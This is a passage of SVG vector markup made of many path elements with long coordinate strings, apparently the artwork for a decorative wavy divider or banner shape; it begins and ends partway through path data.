73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 